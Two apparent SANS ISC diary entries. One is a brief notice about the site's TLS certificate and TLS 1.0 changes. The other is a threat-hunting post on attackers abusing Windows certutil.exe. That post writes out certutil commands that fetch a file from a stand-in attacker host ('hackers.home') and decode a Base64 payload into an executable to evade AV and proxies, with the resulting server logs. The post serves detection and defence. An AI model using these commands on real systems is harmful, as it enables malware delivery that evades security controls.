ISC/DShield Website TLS Updates
On Thursday, we will change our TLS certificate to one issued by Letsencrypt. In the past, we used normal "commercial" certificates. Until a few months ago, we used HTTP Public Key Pinning. It appears that key pinning is no longer going to be supported by browsers, so we decided to remove this feature, which enabled us to use Letsencrypt. We removed the key pinning header a while ago, and browsers should no longer "pin" for our sites. But in case you are experiencing problems connecting to this site later this week, please let us know. You may still be able to connect to www.dshield.org if you can not connect to isc.sans.edu.
We will also make another attempt to turn off TLS 1.0 support. While strictly speaking not a big risk to our site, we try to follow best practices. In the past, we had issues with some podcast players. But the service hosting our podcast MP3s has already turned off TLS 1.0, so this should not be an issue anymore. Again: Please report errors.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|
A Suspicious Use of certutil.exe
The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the SysInternal suite[1] and psexec.exe, others are builtin in Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the "certutil.exe" tool. The purpose of this tool is to dump and display certification authority (CA) information, manage certificates and keys. This is a command line tool that accepts a lot of parameters [2]. A classic use of certutil.exe is to easily process Base64 encoded data:
C:\Temp> certutil.exe -decode input.txt output.exe
But, it is possible to use the tool to perform an important task for attackers: To fetch data from the Internet! Indeed, many Microsoft tools are able to fetch an online file using a URL schema (ftp://, http://, etc). I presume you already know that, in every dialogue box used to open/save a file, you can provide a URL:
.png)
It is exactly the same with certutil.exe which can fetch data from the Internet. I spotted a script which uses it in this way. Here is an example of download:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe **** Online **** 000000 ... 1056d0 CertUtil: -URLCache command completed successfully.
Interesting, the tool makes two connections to the remote web server using two different User-Agents. Here is an extract from the web server logs:
10.x.x.x - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0" 10.x.x.x - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent”
What about the command line options?
- "-urlcache" is used to perform URL cache management action.
- "-f" is used to force fetching the specified URL and updating the cache.
- "-split" is used to dump the file on disk.
Let's combine the two features: grab a Base64 encoded text file to bypass AV & proxies and decode it to easily drop a malicious exec on your target:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
So, no need to install a curl or wget, certutil.exe is available for this basic feature!
[1] https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
[2] https://ss64.com/nt/certutil.html
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments